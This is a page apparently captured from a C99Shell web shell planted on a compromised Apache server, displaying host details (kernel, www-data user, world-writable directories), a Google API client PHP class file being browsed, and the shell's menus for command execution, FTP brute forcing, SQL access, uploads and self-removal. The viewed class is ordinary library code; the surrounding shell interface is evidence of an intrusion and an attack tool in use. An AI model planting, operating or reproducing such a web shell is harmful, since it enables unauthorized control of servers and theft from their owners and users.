!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/dokan/script/vendor/google/apiclient-services/src/Google/Service/AdExchangeBuyer/   drwxrwxrwx
Free 13.02 GB of 57.97 GB (22.46%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     MarketplaceDeal.php (7.96 KB)      -rwxrwxrwx
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/*
 * Copyright 2014 Google Inc.
 *
 * Licensed under the Apache License, Version 2.0 (the "License"); you may not
 * use this file except in compliance with the License. You may obtain a copy of
 * the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
 * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
 * License for the specific language governing permissions and limitations under
 * the License.
 */

class Google_Service_AdExchangeBuyer_MarketplaceDeal extends Google_Collection
{
  protected 
$collection_key 'sharedTargetings';
  protected 
$buyerPrivateDataType 'Google_Service_AdExchangeBuyer_PrivateData';
  protected 
$buyerPrivateDataDataType '';
  public 
$creationTimeMs;
  public 
$creativePreApprovalPolicy;
  public 
$creativeSafeFrameCompatibility;
  public 
$dealId;
  protected 
$dealServingMetadataType 'Google_Service_AdExchangeBuyer_DealServingMetadata';
  protected 
$dealServingMetadataDataType '';
  protected 
$deliveryControlType 'Google_Service_AdExchangeBuyer_DeliveryControl';
  protected 
$deliveryControlDataType '';
  public 
$externalDealId;
  public 
$flightEndTimeMs;
  public 
$flightStartTimeMs;
  public 
$inventoryDescription;
  public 
$isRfpTemplate;
  public 
$isSetupComplete;
  public 
$kind;
  public 
$lastUpdateTimeMs;
  public 
$makegoodRequestedReason;
  public 
$name;
  public 
$productId;
  public 
$productRevisionNumber;
  public 
$programmaticCreativeSource;
  public 
$proposalId;
  protected 
$sellerContactsType 'Google_Service_AdExchangeBuyer_ContactInformation';
  protected 
$sellerContactsDataType 'array';
  protected 
$sharedTargetingsType 'Google_Service_AdExchangeBuyer_SharedTargeting';
  protected 
$sharedTargetingsDataType 'array';
  public 
$syndicationProduct;
  protected 
$termsType 'Google_Service_AdExchangeBuyer_DealTerms';
  protected 
$termsDataType '';
  public 
$webPropertyCode;

  
/**
   * @param Google_Service_AdExchangeBuyer_PrivateData
   */
  
public function setBuyerPrivateData(Google_Service_AdExchangeBuyer_PrivateData $buyerPrivateData)
  {
    
$this->buyerPrivateData $buyerPrivateData;
  }
  
/**
   * @return Google_Service_AdExchangeBuyer_PrivateData
   */
  
public function getBuyerPrivateData()
  {
    return 
$this->buyerPrivateData;
  }
  public function 
setCreationTimeMs($creationTimeMs)
  {
    
$this->creationTimeMs $creationTimeMs;
  }
  public function 
getCreationTimeMs()
  {
    return 
$this->creationTimeMs;
  }
  public function 
setCreativePreApprovalPolicy($creativePreApprovalPolicy)
  {
    
$this->creativePreApprovalPolicy $creativePreApprovalPolicy;
  }
  public function 
getCreativePreApprovalPolicy()
  {
    return 
$this->creativePreApprovalPolicy;
  }
  public function 
setCreativeSafeFrameCompatibility($creativeSafeFrameCompatibility)
  {
    
$this->creativeSafeFrameCompatibility $creativeSafeFrameCompatibility;
  }
  public function 
getCreativeSafeFrameCompatibility()
  {
    return 
$this->creativeSafeFrameCompatibility;
  }
  public function 
setDealId($dealId)
  {
    
$this->dealId $dealId;
  }
  public function 
getDealId()
  {
    return 
$this->dealId;
  }
  
/**
   * @param Google_Service_AdExchangeBuyer_DealServingMetadata
   */
  
public function setDealServingMetadata(Google_Service_AdExchangeBuyer_DealServingMetadata $dealServingMetadata)
  {
    
$this->dealServingMetadata $dealServingMetadata;
  }
  
/**
   * @return Google_Service_AdExchangeBuyer_DealServingMetadata
   */
  
public function getDealServingMetadata()
  {
    return 
$this->dealServingMetadata;
  }
  
/**
   * @param Google_Service_AdExchangeBuyer_DeliveryControl
   */
  
public function setDeliveryControl(Google_Service_AdExchangeBuyer_DeliveryControl $deliveryControl)
  {
    
$this->deliveryControl $deliveryControl;
  }
  
/**
   * @return Google_Service_AdExchangeBuyer_DeliveryControl
   */
  
public function getDeliveryControl()
  {
    return 
$this->deliveryControl;
  }
  public function 
setExternalDealId($externalDealId)
  {
    
$this->externalDealId $externalDealId;
  }
  public function 
getExternalDealId()
  {
    return 
$this->externalDealId;
  }
  public function 
setFlightEndTimeMs($flightEndTimeMs)
  {
    
$this->flightEndTimeMs $flightEndTimeMs;
  }
  public function 
getFlightEndTimeMs()
  {
    return 
$this->flightEndTimeMs;
  }
  public function 
setFlightStartTimeMs($flightStartTimeMs)
  {
    
$this->flightStartTimeMs $flightStartTimeMs;
  }
  public function 
getFlightStartTimeMs()
  {
    return 
$this->flightStartTimeMs;
  }
  public function 
setInventoryDescription($inventoryDescription)
  {
    
$this->inventoryDescription $inventoryDescription;
  }
  public function 
getInventoryDescription()
  {
    return 
$this->inventoryDescription;
  }
  public function 
setIsRfpTemplate($isRfpTemplate)
  {
    
$this->isRfpTemplate $isRfpTemplate;
  }
  public function 
getIsRfpTemplate()
  {
    return 
$this->isRfpTemplate;
  }
  public function 
setIsSetupComplete($isSetupComplete)
  {
    
$this->isSetupComplete $isSetupComplete;
  }
  public function 
getIsSetupComplete()
  {
    return 
$this->isSetupComplete;
  }
  public function 
setKind($kind)
  {
    
$this->kind $kind;
  }
  public function 
getKind()
  {
    return 
$this->kind;
  }
  public function 
setLastUpdateTimeMs($lastUpdateTimeMs)
  {
    
$this->lastUpdateTimeMs $lastUpdateTimeMs;
  }
  public function 
getLastUpdateTimeMs()
  {
    return 
$this->lastUpdateTimeMs;
  }
  public function 
setMakegoodRequestedReason($makegoodRequestedReason)
  {
    
$this->makegoodRequestedReason $makegoodRequestedReason;
  }
  public function 
getMakegoodRequestedReason()
  {
    return 
$this->makegoodRequestedReason;
  }
  public function 
setName($name)
  {
    
$this->name $name;
  }
  public function 
getName()
  {
    return 
$this->name;
  }
  public function 
setProductId($productId)
  {
    
$this->productId $productId;
  }
  public function 
getProductId()
  {
    return 
$this->productId;
  }
  public function 
setProductRevisionNumber($productRevisionNumber)
  {
    
$this->productRevisionNumber $productRevisionNumber;
  }
  public function 
getProductRevisionNumber()
  {
    return 
$this->productRevisionNumber;
  }
  public function 
setProgrammaticCreativeSource($programmaticCreativeSource)
  {
    
$this->programmaticCreativeSource $programmaticCreativeSource;
  }
  public function 
getProgrammaticCreativeSource()
  {
    return 
$this->programmaticCreativeSource;
  }
  public function 
setProposalId($proposalId)
  {
    
$this->proposalId $proposalId;
  }
  public function 
getProposalId()
  {
    return 
$this->proposalId;
  }
  
/**
   * @param Google_Service_AdExchangeBuyer_ContactInformation[]
   */
  
public function setSellerContacts($sellerContacts)
  {
    
$this->sellerContacts $sellerContacts;
  }
  
/**
   * @return Google_Service_AdExchangeBuyer_ContactInformation[]
   */
  
public function getSellerContacts()
  {
    return 
$this->sellerContacts;
  }
  
/**
   * @param Google_Service_AdExchangeBuyer_SharedTargeting[]
   */
  
public function setSharedTargetings($sharedTargetings)
  {
    
$this->sharedTargetings $sharedTargetings;
  }
  
/**
   * @return Google_Service_AdExchangeBuyer_SharedTargeting[]
   */
  
public function getSharedTargetings()
  {
    return 
$this->sharedTargetings;
  }
  public function 
setSyndicationProduct($syndicationProduct)
  {
    
$this->syndicationProduct $syndicationProduct;
  }
  public function 
getSyndicationProduct()
  {
    return 
$this->syndicationProduct;
  }
  
/**
   * @param Google_Service_AdExchangeBuyer_DealTerms
   */
  
public function setTerms(Google_Service_AdExchangeBuyer_DealTerms $terms)
  {
    
$this->terms $terms;
  }
  
/**
   * @return Google_Service_AdExchangeBuyer_DealTerms
   */
  
public function getTerms()
  {
    return 
$this->terms;
  }
  public function 
setWebPropertyCode($webPropertyCode)
  {
    
$this->webPropertyCode $webPropertyCode;
  }
  public function 
getWebPropertyCode()
  {
    return 
$this->webPropertyCode;
  }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0059 ]--